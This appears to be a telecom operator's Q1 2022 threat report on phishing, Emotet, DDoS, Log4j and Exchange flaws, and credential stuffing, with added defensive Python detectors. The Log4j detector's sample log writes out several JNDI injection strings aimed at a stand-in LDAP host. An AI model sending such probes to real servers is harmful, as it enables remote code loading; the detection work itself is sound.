
Cybersecurity weather forecast – 1st quarter 2022

19 May 2022

Figures

General information

The number of incidents in the first quarter of 2022 is up by 37% compared with the previous quarter. Phishing attacks are still the preferred initial means of access for attackers. Emotet came back with a bang in February, confirming that this malware program is back in circulation despite being dismantled in 2021.

Phishing

The period included an incident in March in which several people were targeted by phishing attacks impersonating the eboo service. What makes this campaign novel is that it was spread exclusively via text message (see image below). Through this channel, link shorteners (cutt.ly, bit.ly, etc.) are still widely used for phishing purposes. Shorteners keep the text message brief, but they also hide the final destination and redirect victims to other, more dubious links.


The malicious actors’ aim was to steal the victims' means of authentication by spoofing the original “service” page. Access to these accounts allows malicious actors to perpetrate fraud without the victims' knowledge.
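The shortener-plus-brand-name pattern described above is easy to spot mechanically at the point where messages are collected or reported. The following Python function is an added example, not code from POST CyberForce or this report: it extracts the links from an SMS body, flags known shortener domains (cutt.ly and bit.ly are named above; the other entries in the list are an assumption), raw-IP hosts, and links whose host does not match a brand the message names. The sample messages and the `eboo.example` domain are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Shortener domains: cutt.ly and bit.ly are named in the report; the rest
# are an assumption added for illustration, not data from the report.
SHORTENER_DOMAINS = {"cutt.ly", "bit.ly", "tinyurl.com", "t.co", "is.gd"}

# Brands the report says were impersonated this quarter.
WATCHED_BRANDS = ("eboo", "post", "microsoft", "office", "outlook")

URL_RE = re.compile(r"https?://[^\s<>\"']+|\bwww\.[^\s<>\"']+", re.IGNORECASE)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def extract_urls(text):
    """Pull every URL out of a message body, trimming trailing punctuation."""
    urls = []
    for match in URL_RE.finditer(text):
        url = match.group(0).rstrip(".,;:)")
        if url.lower().startswith("www."):
            url = "http://" + url
        urls.append(url)
    return urls


def host_of(url):
    """Lower-cased host part of a URL ('' if the URL has none)."""
    return (urlsplit(url).hostname or "").lower().rstrip(".")


def triage_sms(text):
    """Return [(url, [reasons])] for every link in the message that looks
    suspicious. A message whose links raise no flag returns an empty list."""
    lowered = text.lower()
    mentioned = [b for b in WATCHED_BRANDS if re.search(r"\b%s\b" % b, lowered)]
    findings = []
    for url in extract_urls(text):
        host = host_of(url)
        reasons = []
        if host in SHORTENER_DOMAINS:
            reasons.append("link shortener hides the final destination")
        if IPV4_RE.match(host):
            reasons.append("link points at a raw IP address")
        if mentioned and not any(b in host for b in mentioned):
            reasons.append("message names %s but the link host is %s"
                           % ("/".join(mentioned), host))
        if reasons:
            findings.append((url, reasons))
    return findings


if __name__ == "__main__":
    # Constructed sample messages, modelled on the campaign described in the report.
    for sms in (
        "eboo: your account is suspended, confirm at https://cutt.ly/abc123 now",
        "Your eboo statement is ready: https://www.eboo.example/statements",
    ):
        print(sms)
        for url, reasons in triage_sms(sms):
            print("  ", url, "->", "; ".join(reasons))
```

The brand-mismatch rule will flag legitimate third-party links (a bank's newsletter hosted elsewhere, for instance), so it is a triage signal for analysts or a user-reporting bot rather than a blocking rule on its own.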

Phishing campaigns aimed at stealing victims' bank account details remain prevalent. Financial motivation and the desire for a quick return on investment are the reasons behind these attacks.

We have also seen the POST brand being used to try to steal bank card details by claiming that a victim needs to make an extra payment to receive a package.

Finally, when the victims are companies, malicious actors have been able to use their ingenuity to steal account identifiers. The Microsoft Office 365 and Outlook authentication pages were spoofed for the purposes of stealing professional users’ credentials, whether for access to the company’s Webmail or its Active Directory accounts. These campaigns are mainly conducted to gain initial access to the target company with a view to achieving the desired objective (theft of data/confidential documents, fraud, reuse of resources, etc.).

During the period, we were able to compile the following ranking of malicious actors’ preferred hosting providers for Q1 2022:

  1. CloudFlare Inc. (+3)
  2. Google LLC (-1)
  3. Microsoft Corporation (+4)
  4. Dedibox Customer IP Range (New)
  5. Amazon Technologies Inc. (=)
  6. Namecheap Inc. (-4)
  7. DigitalOcean LLC (New)
  8. OVH SAS (=)
  9. Domain Names Registrar Reg.ru Ltd (New)
  10. Bitly Inc (-7)

Spam

We have seen spam campaigns targeting Luxembourg mobile numbers with the special feature of using the iMessage service (Apple) to spread unwanted content. The dissemination of these messages therefore bypasses the traditional mobile networks. These messages promised payment if the victim called a foreign number. This is a classic case of an attempted Wangiri-like phone scam without using an initial call to pique the curiosity of potential victims.

Malware

Emotet

After the dismantling and seizure of Emotet command servers during 2021, we witnessed a reappearance of this malicious code in the first quarter of 2022 in Luxembourg.
This malicious code is sometimes used as a malware loader for other cybercriminals. It has the ability to change its signature, making it harder to detect.

We have seen this malware being sent as an attachment from a legitimate e-mail address spoofed by the attacker. The e-mail address may, for example, come from an address book stolen from a machine belonging to a third party that was the subject of a previous attack.

In order to increase its credibility, malicious actors add an e-mail exchange to the thread. This process leads the victim to believe that they have had an exchange with a legitimate interlocutor.

In addition, in order to bypass antivirus software, the malicious code is delivered in a compressed, password-protected archive, so that scanners cannot inspect its contents.

The malicious file is presented as an anti-virus, which is the attacker's chosen means of reducing the target's vigilance.

When it is opened, Microsoft Excel's protection mechanisms are disabled, allowing the embedded scripts to run and the malicious actors to take control of the machine.
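Two of the delivery traits described above (a password-protected archive that scanners cannot open, and an Excel document that needs its protections disabled to run its scripts) can be checked cheaply at a mail gateway before any antivirus verdict. The Python below is an added example, not POST CyberForce's tooling: it reads the encryption bit straight from the ZIP local file header without extracting anything, and looks inside an OOXML package for a VBA project part. The two sample builders construct minimal stand-in files for the demonstration; they are not real documents.

```python
import io
import struct
import zipfile

ZIP_LOCAL_SIG = 0x04034B50       # "PK\x03\x04", start of a local file header
ZIP_ENCRYPTED_FLAG = 0x0001      # bit 0 of the general-purpose flag field


def zip_is_encrypted(data):
    """True if the archive's first local file header carries the encryption
    bit. The header is parsed directly, so a password-protected archive is
    recognised without any attempt to open or extract it."""
    if len(data) < 30:
        return False
    sig, _version, flags, _method = struct.unpack_from("<IHHH", data, 0)
    return sig == ZIP_LOCAL_SIG and bool(flags & ZIP_ENCRYPTED_FLAG)


def office_has_macros(data):
    """True if an OOXML document (.xlsm, .docm, ...) embeds a VBA project."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())
    except zipfile.BadZipFile:
        return False


def triage_attachment(filename, data):
    """Return the reasons an attachment deserves a closer look (empty = none)."""
    name = filename.lower()
    reasons = []
    if name.endswith(".zip") and zip_is_encrypted(data):
        reasons.append("password-protected archive: contents cannot be scanned")
    if name.endswith((".xlsm", ".docm", ".xlsx", ".docx")) and office_has_macros(data):
        reasons.append("Office document carries a VBA macro project")
    return reasons


def build_encrypted_zip_sample():
    """Constructed sample: a minimal stored-entry local header with the
    encryption bit set, followed by placeholder bytes. Only the local header
    is built because that is all zip_is_encrypted() reads."""
    name = b"invoice.xlsm"
    payload = b"placeholder bytes, not a real document"
    header = struct.pack("<IHHHHHIIIHH", ZIP_LOCAL_SIG, 20, ZIP_ENCRYPTED_FLAG,
                         0, 0, 0, 0, len(payload), len(payload), len(name), 0)
    return header + name + payload


def build_office_sample(with_macros):
    """Constructed sample: a skeleton OOXML package, optionally with a VBA part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        if with_macros:
            zf.writestr("xl/vbaProject.bin", b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    for fname, blob in (("invoice.zip", build_encrypted_zip_sample()),
                        ("report.xlsm", build_office_sample(True)),
                        ("report.xlsx", build_office_sample(False))):
        print(fname, "->", triage_attachment(fname, blob) or "no flags")
```

Neither signal is proof of malice on its own: finance teams do exchange encrypted archives and some workbooks legitimately carry macros. The point is that both are exactly the cases where the antivirus verdict is least informative, so they are the attachments to quarantine for manual review or detonation rather than deliver on a clean scan.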

If you find yourself in this situation, we recommend that you contact cybersecurity experts. POST CyberForce can help you to deal with such circumstances.

DoS/DDoS

The number of attacks remained stable over the period. However, the volume of attacks decreased to 1.1 Gbps.
The techniques used are:

  • Global UDP fragment abnormal
  • ACK flood

Masquerade attacks

During the period, we saw Facebook being used to publish fake POST Luxembourg pages.
These pages contained links to a web page asking visitors to enter their mobile number in order to access esports-type competitions. These pages were not related to POST Esports Masters. Again, these are scams designed to trick people into subscribing to premium-rate text messages without their knowledge.

Vulnerabilities

Log4j

Disclosed in December 2021, the Log4j vulnerability is still being used in attempted attacks this year. It remains the most critical vulnerability of recent years in terms of the scale of the attack surface and how easy it is to exploit.
We have seen a lot of scanning activity in recent months. Despite the warnings about how to handle this vulnerability, we found that some servers remained vulnerable. If you have not already done so, we strongly advise you to take the necessary measures to protect yourself against it (see the CIRCL advisory on this vulnerability: https://www.circl.lu/pub/tr-65/).
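The scanning activity mentioned above leaves a recognisable trace in web server logs: the probe carries a Log4j lookup string, usually in the query string or a request header, and is often percent-encoded or wrapped in nested lookups so that the literal text "jndi" never appears. The Python below is an added example, not tooling from POST CyberForce or CIRCL: it URL-decodes each access-log line, collapses nested `${...}` lookups to the text they would resolve to, and reports the lines that still contain a JNDI lookup. The log lines are constructed (203.0.113.0/24 is a documentation range) and the parsing assumes a combined-format access log.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup (no further "${" or braces inside it).
INNER_LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")
JNDI_RE = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def _resolve(match):
    """Replace one innermost lookup with the text Log4j would substitute,
    except for a jndi lookup, which is kept so the detector can see it."""
    body = match.group(1)
    if body.lower().startswith("jndi"):
        return match.group(0)
    if ":-" in body:                      # ${env:UNSET:-j} -> default value "j"
        return body.rsplit(":-", 1)[1]
    if ":" in body:                       # ${lower:J} -> "J"
        return body.split(":", 1)[1]
    return body


def collapse_lookups(text):
    """Repeatedly resolve innermost lookups until the text stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = INNER_LOOKUP_RE.sub(_resolve, text)
    return text


def is_log4shell_probe(line):
    """True if the line contains a JNDI lookup after decoding and collapsing."""
    decoded = unquote(unquote(line))      # probes are often encoded once or twice
    return bool(JNDI_RE.search(collapse_lookups(decoded)))


def scan_access_log(lines):
    """Return (line_number, line) for each line that looks like a probe."""
    return [(n, line) for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


# Constructed sample access log: one normal request and three probe variants
# (plain, wrapped in a nested lookup in the User-Agent, and percent-encoded).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [12/Jan/2022:10:01:02 +0100] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Jan/2022:10:01:07 +0100] "GET /?x=${jndi:ldap://203.0.113.10/a} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [12/Jan/2022:10:01:09 +0100] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://203.0.113.10/b}"',
    '10.0.0.9 - - [12/Jan/2022:10:01:11 +0100] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for number, line in scan_access_log(SAMPLE_ACCESS_LOG):
        print("line %d: %s" % (number, line))
```

A hit in the access log tells you that you were probed, not that the probe succeeded; the server's own response (a 404 is visible above) says nothing about whether a vulnerable Log4j instance downstream processed the string. The action on a hit is the same as the advice in this section: confirm the Log4j version on every Java service behind that endpoint and patch.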

Microsoft Exchange Server

At the beginning of 2022, mail servers exposing Microsoft Exchange Server on the internet remained vulnerable because patches released earlier had still not been applied. The criticality of these vulnerabilities is particularly high: the servers could be exposed to privilege escalation or remote code execution.
The following is a list of vulnerabilities that could be exploited by a malicious actor:

  • CVE-2021-26427 (Critical)
  • CVE-2021-42321
  • CVE-2021-41348
  • CVE-2021-31196
  • CVE-2021-31206
  • CVE-2021-33768
  • CVE-2021-31195
  • CVE-2021-31198
  • CVE-2021-31207
  • CVE-2021-31209

We strongly recommend that you apply the necessary patches to protect your servers and the information assets they hold, namely your e-mail.

Intrusions

We have witnessed several intrusion attempts during the period using “credential stuffing” techniques. The threat from this method, which replays dictionaries of credentials leaked in previous breaches, is greater than ever. Malicious actors exploit the weakness of users who reuse the same credentials on multiple services.
Here are some tips on how to avoid this kind of situation:

  • Use different passwords for each personal and business account.
  • Avoid basing your passwords on personal information that is easy to find online (social media, blog, etc.).
  • The password must contain a minimum of 12 characters mixing upper and lower case letters, numbers and special characters. You can also use a secret phrase.
  • You must be the only person who knows the password. Never keep a default password.
  • Enable two-factor authentication if you have the option.
  • Finally, do not hesitate to change your password at the slightest suspicion.

These precautions are there to protect you. Applying them is vital. Reusing the same password on several sites and using passwords that are too simple increase the risk of your access being compromised.
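The user-side precautions above are complemented by a server-side signal: credential stuffing tries one leaked password against each of many accounts, so it shows up as a single source failing logins against many distinct usernames in a short window, unlike a brute-force attack, which hammers one account. The Python below is an added example, not POST CyberForce's detection logic: it slides a time window over a constructed authentication log (the `timestamp source_ip username result` format is made up for the demonstration; real SSO, VPN or webmail logs need their own parser) and reports sources that exceed a distinct-user and failure-ratio threshold, listing any accounts that did succeed during the spray, since those are the ones whose reused password matched.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log; 198.51.100.0/24 and 192.0.2.0/24 are documentation ranges.
SAMPLE_AUTH_LOG = [
    "2022-03-14T08:00:01Z 198.51.100.7 alice FAIL",
    "2022-03-14T08:00:03Z 198.51.100.7 bob FAIL",
    "2022-03-14T08:00:04Z 198.51.100.7 carol FAIL",
    "2022-03-14T08:00:06Z 198.51.100.7 dave FAIL",
    "2022-03-14T08:00:08Z 198.51.100.7 erin OK",
    "2022-03-14T08:00:09Z 198.51.100.7 frank FAIL",
    "2022-03-14T08:00:20Z 192.0.2.33 alice FAIL",
    "2022-03-14T08:00:45Z 192.0.2.33 alice OK",
]


def parse_line(line):
    """Split one line of the made-up format into (timestamp, ip, user, result)."""
    ts, ip, user, result = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result


def detect_credential_stuffing(lines, window=timedelta(minutes=5),
                               min_users=5, min_fail_ratio=0.8):
    """Return {source_ip: stats} for sources that, within any `window`, tried
    at least `min_users` distinct accounts with a failure ratio of at least
    `min_fail_ratio`. Stats describe the widest qualifying window found."""
    by_ip = defaultdict(list)
    for line in lines:
        ts, ip, user, result = parse_line(line)
        by_ip[ip].append((ts, user, result))

    suspects = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Advance the window start until the span fits inside `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            span = events[start:end + 1]
            users = {u for _, u, _ in span}
            failures = sum(1 for _, _, r in span if r == "FAIL")
            if len(users) < min_users or failures / len(span) < min_fail_ratio:
                continue
            if ip not in suspects or len(users) > suspects[ip]["distinct_users"]:
                suspects[ip] = {
                    "distinct_users": len(users),
                    "attempts": len(span),
                    "failures": failures,
                    # Accounts that logged in during the spray: treat as compromised.
                    "successes": sorted({u for _, u, r in span if r == "OK"}),
                }
    return suspects


if __name__ == "__main__":
    for ip, stats in detect_credential_stuffing(SAMPLE_AUTH_LOG).items():
        print(ip, stats)
```

The thresholds are deliberately conservative for a small sample; on a real identity provider you would tune `window` and `min_users` against a week of normal traffic, and treat the `successes` list as the incident-response starting point: those sessions get revoked and those users get a forced reset and, as the section recommends, two-factor authentication.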
